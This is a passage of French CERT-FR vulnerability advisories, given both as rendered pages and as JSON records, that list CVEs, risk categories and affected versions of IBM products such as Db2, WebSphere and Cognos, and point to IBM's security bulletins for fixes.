"name": "CVE-2025-20623",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-20623"
},
{
"name": "CVE-2025-48997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48997"
},
{
"name": "CVE-2020-5260",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-5260"
},
{
"name": "CVE-2025-49796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49796"
},
{
"name": "CVE-2025-21919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21919"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2024-34397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34397"
},
{
"name": "CVE-2025-21991",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21991"
},
{
"name": "CVE-2025-7338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7338"
},
{
"name": "CVE-2025-24790",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24790"
},
{
"name": "CVE-2024-45332",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45332"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
},
{
"name": "CVE-2025-23150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23150"
}
],
"initial_release_date": "2025-08-29T00:00:00",
"last_revision_date": "2025-08-29T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0746",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-08-29T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243411",
"url": "https://www.ibm.com/support/pages/node/7243411"
},
{
"published_at": "2025-08-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7242915",
"url": "https://www.ibm.com/support/pages/node/7242915"
},
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243372",
"url": "https://www.ibm.com/support/pages/node/7243372"
},
{
"published_at": "2025-08-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7242159",
"url": "https://www.ibm.com/support/pages/node/7242159"
},
{
"published_at": "2025-08-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243146",
"url": "https://www.ibm.com/support/pages/node/7243146"
},
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7242161",
"url": "https://www.ibm.com/support/pages/node/7242161"
},
{
"published_at": "2025-08-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243144",
"url": "https://www.ibm.com/support/pages/node/7243144"
},
{
"published_at": "2025-08-25",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243011",
"url": "https://www.ibm.com/support/pages/node/7243011"
},
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243373",
"url": "https://www.ibm.com/support/pages/node/7243373"
}
]
}
CERTFR-2025-AVI-0279
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Db2 | Db2 versions antérieures à 5.1.2 pour Cloud Pak for Data | ||
| IBM | WebSphere | WebSphere Application Server Liberty sans le correctif APAR PH65394 | ||
| IBM | Db2 Warehouse | Db2 Warehouse versions antérieures à 5.1.2 pour Cloud Pak for Data | ||
| IBM | WebSphere | WebSphere Hybrid Edition sans le dernier correctif de sécurité | ||
| IBM | QRadar Analyst Workflow | QRadar Analyst Workflow versions antérieures à 3.0.0 |
References
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Db2 versions ant\u00e9rieures \u00e0 5.1.2 pour Cloud Pak for Data",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server Liberty sans le correctif APAR PH65394",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Warehouse versions ant\u00e9rieures \u00e0 5.1.2 pour Cloud Pak for Data",
"product": {
"name": "Db2 Warehouse",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Analyst Workflow versions ant\u00e9rieures \u00e0 3.0.0",
"product": {
"name": "QRadar Analyst Workflow",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2021-44906",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44906"
},
{
"name": "CVE-2023-45857",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45857"
},
{
"name": "CVE-2023-45142",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45142"
},
{
"name": "CVE-2022-48890",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48890"
},
{
"name": "CVE-2024-35176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35176"
},
{
"name": "CVE-2024-37071",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37071"
},
{
"name": "CVE-2025-25285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25285"
},
{
"name": "CVE-2024-6232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
},
{
"name": "CVE-2024-34997",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34997"
},
{
"name": "CVE-2024-51479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
},
{
"name": "CVE-2024-43398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43398"
},
{
"name": "CVE-2024-35946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35946"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2024-41761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41761"
},
{
"name": "CVE-2022-29153",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29153"
},
{
"name": "CVE-2023-52605",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52605"
},
{
"name": "CVE-2021-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23337"
},
{
"name": "CVE-2018-6341",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-6341"
},
{
"name": "CVE-2023-52455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52455"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-26740",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26740"
},
{
"name": "CVE-2024-47764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47764"
},
{
"name": "CVE-2025-25288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25288"
},
{
"name": "CVE-2024-35790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35790"
},
{
"name": "CVE-2022-48921",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48921"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2025-25290",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25290"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-39908",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39908"
},
{
"name": "CVE-2021-47495",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47495"
},
{
"name": "CVE-2024-41946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41946"
},
{
"name": "CVE-2023-52832",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52832"
},
{
"name": "CVE-2024-41110",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41110"
},
{
"name": "CVE-2024-27281",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27281"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2024-6484",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6484"
},
{
"name": "CVE-2020-13844",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13844"
},
{
"name": "CVE-2024-26776",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26776"
},
{
"name": "CVE-2024-6485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6485"
},
{
"name": "CVE-2024-41762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41762"
},
{
"name": "CVE-2024-39494",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39494"
},
{
"name": "CVE-2025-23184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23184"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2021-4204",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4204"
},
{
"name": "CVE-2024-26843",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26843"
},
{
"name": "CVE-2024-40679",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40679"
},
{
"name": "CVE-2023-52885",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52885"
},
{
"name": "CVE-2018-20225",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20225"
},
{
"name": "CVE-2019-11253",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11253"
},
{
"name": "CVE-2023-52898",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52898"
},
{
"name": "CVE-2025-25289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25289"
},
{
"name": "CVE-2024-45663",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45663"
},
{
"name": "CVE-2023-52467",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52467"
},
{
"name": "CVE-2024-41123",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41123"
},
{
"name": "CVE-2024-36620",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36620"
},
{
"name": "CVE-2022-48706",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48706"
},
{
"name": "CVE-2024-49761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49761"
}
],
"initial_release_date": "2025-04-04T00:00:00",
"last_revision_date": "2025-04-04T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0279",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-04-04T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-04-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7230024",
"url": "https://www.ibm.com/support/pages/node/7230024"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229770",
"url": "https://www.ibm.com/support/pages/node/7229770"
},
{
"published_at": "2025-03-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229443",
"url": "https://www.ibm.com/support/pages/node/7229443"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229768",
"url": "https://www.ibm.com/support/pages/node/7229768"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229772",
"url": "https://www.ibm.com/support/pages/node/7229772"
}
]
}
CERTFR-2025-AVI-0562
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Db2 | DB2 Data Management Console versions 3.1.x postérieures à 3.1.11 et antérieures à 3.1.13.1 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 11.2.x antérieures à 11.2.4 FP6 | ||
| IBM | Sterling | Sterling Transformation Extender version 10.1.1.1 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Sterling | Sterling Transformation Extender version 11.0.0.0 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Sterling | Sterling Transformation Extender version 10.1.0.2 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 12.0.x antérieures à 12.0.4 FP1 | ||
| IBM | Sterling | Sterling Transformation Extender version 10.1.2.1 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Informix Dynamic Server | Informix Dynamic Server versions 14.10.x antérieures à 14.10.xC11W2 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct File Agent versions 1.4.0.x antérieures à 1.4.0.4 | ||
| IBM | Sterling | Sterling Transformation Extender versions 11.0.1.x antérieures à 11.0.1.1 sans le correctif de sécurité APAR PH67016 | ||
| IBM | Db2 | DB2 Data Management Console pour CPD versions antérieures à 5.1.2 | ||
| IBM | Informix Dynamic Server | Informix Dynamic Server versions 12.10.x antérieures à 12.10.xC16W2 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "DB2 Data Management Console versions 3.1.x post\u00e9rieures \u00e0 3.1.11 et ant\u00e9rieures \u00e0 3.1.13.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 11.2.x ant\u00e9rieures \u00e0 11.2.4 FP6",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 10.1.1.1 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 11.0.0.0 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 10.1.0.2 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 12.0.x ant\u00e9rieures \u00e0 12.0.4 FP1",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 10.1.2.1 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Informix Dynamic Server versions 14.10.x ant\u00e9rieures \u00e0 14.10.xC11W2",
"product": {
"name": "Informix Dynamic Server",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct File Agent versions 1.4.0.x ant\u00e9rieures \u00e0 1.4.0.4",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender versions 11.0.1.x ant\u00e9rieures \u00e0 11.0.1.1 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67016",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Data Management Console pour CPD versions ant\u00e9rieures \u00e0 5.1.2",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Informix Dynamic Server versions 12.10.x ant\u00e9rieures \u00e0 12.10.xC16W2",
"product": {
"name": "Informix Dynamic Server",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2021-43816",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43816"
},
{
"name": "CVE-2024-21534",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21534"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2022-32149",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32149"
},
{
"name": "CVE-2024-10917",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10917"
},
{
"name": "CVE-2025-1302",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1302"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2024-52900",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52900"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2024-27289",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27289"
},
{
"name": "CVE-2022-41721",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41721"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2024-21145",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21145"
},
{
"name": "CVE-2024-4741",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4741"
},
{
"name": "CVE-2025-2900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2900"
},
{
"name": "CVE-2025-1991",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1991"
},
{
"name": "CVE-2022-23648",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23648"
},
{
"name": "CVE-2023-39325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39325"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2024-21210",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21210"
},
{
"name": "CVE-2024-2511",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2511"
},
{
"name": "CVE-2022-21698",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21698"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2024-27267",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27267"
},
{
"name": "CVE-2022-27664",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27664"
},
{
"name": "CVE-2024-21208",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21208"
}
],
"initial_release_date": "2025-07-04T00:00:00",
"last_revision_date": "2025-07-04T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0562",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-07-04T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Injection SQL (SQLi)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238455",
"url": "https://www.ibm.com/support/pages/node/7238455"
},
{
"published_at": "2025-07-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238755",
"url": "https://www.ibm.com/support/pages/node/7238755"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238833",
"url": "https://www.ibm.com/support/pages/node/7238833"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238824",
"url": "https://www.ibm.com/support/pages/node/7238824"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238831",
"url": "https://www.ibm.com/support/pages/node/7238831"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238826",
"url": "https://www.ibm.com/support/pages/node/7238826"
},
{
"published_at": "2025-07-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238830",
"url": "https://www.ibm.com/support/pages/node/7238830"
},
{
"published_at": "2025-07-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238753",
"url": "https://www.ibm.com/support/pages/node/7238753"
},
{
"published_at": "2025-06-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238163",
"url": "https://www.ibm.com/support/pages/node/7238163"
}
]
}
CERTFR-2025-AVI-0760
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | QRadar SIEM | User Entity Behavior Analytics pour IBM QRadar SIEM versions antérieures à 5.0.1 | ||
| IBM | WebSphere | IBM Common Licensing pour Websphere Liberty Agent versions 9.0.x antérieures à 9.0.0.2 | ||
| IBM | Db2 | Db2 on Cloud Pak for Data versions antérieures à v5.2.1 | ||
| IBM | WebSphere | IBM Enterprise Application Runtimes pour WebSphere Application Server version 1.0 sans les correctif de sécurité APAR PH67137 et APAR PH67132 | ||
| IBM | WebSphere | Engineering Test Management versions 7.0.2 et 7.0.3 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | Engineering Lifecycle Management 7.0.2 et 7.0.3 pour WebSphere Application Server Liberty versions 17.0.0.3 à 25.0.0.8 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | IBM Common Licensing pour Websphere Liberty ART versions 9.0.x antérieures à 9.0.0.2 | ||
| IBM | WebSphere | Engineering Lifecycle Management 7.1 pour WebSphere Application Server Liberty versions 17.0.0.3 à 25.0.0.8 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | Cloud Pak for Applications versions 5.1 à 5.3 pour WebSphere Application Server Liberty sans les correctifs de sécurité APAR PH67132 et APAR PH67137 | ||
| IBM | WebSphere | Engineering Test Management versions 7.1 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | WebSphere Application Server and WebSphere Application Server Liberty, avec les fonctionnalités jsonp sans le dernier correctif de sécurité | ||
| IBM | WebSphere | WebSphere Hybrid Edition version 5.1 sans les correctifs de sécurité APAR PH67137, APAR PH67132, | ||
| IBM | Db2 | Db2 Warehouse on Cloud Pak for Data versions antérieures à v5.2.1 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "User Entity Behavior Analytics pour IBM QRadar SIEM versions ant\u00e9rieures \u00e0 5.0.1",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Common Licensing pour Websphere Liberty Agent versions 9.0.x ant\u00e9rieures \u00e0 9.0.0.2",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 on Cloud Pak for Data versions ant\u00e9rieures \u00e0 v5.2.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Enterprise Application Runtimes pour WebSphere Application Server version 1.0 sans les correctif de s\u00e9curit\u00e9 APAR PH67137 et APAR PH67132",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Test Management versions 7.0.2 et 7.0.3 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Lifecycle Management 7.0.2 et 7.0.3 pour WebSphere Application Server Liberty versions 17.0.0.3 \u00e0 25.0.0.8 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Common Licensing pour Websphere Liberty ART versions 9.0.x ant\u00e9rieures \u00e0 9.0.0.2",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Lifecycle Management 7.1 pour WebSphere Application Server Liberty versions 17.0.0.3 \u00e0 25.0.0.8 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Applications versions 5.1 \u00e0 5.3 pour WebSphere Application Server Liberty sans les correctifs de s\u00e9curit\u00e9 APAR PH67132 et APAR PH67137",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Test Management versions 7.1 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server and WebSphere Application Server Liberty, avec les fonctionnalit\u00e9s jsonp sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
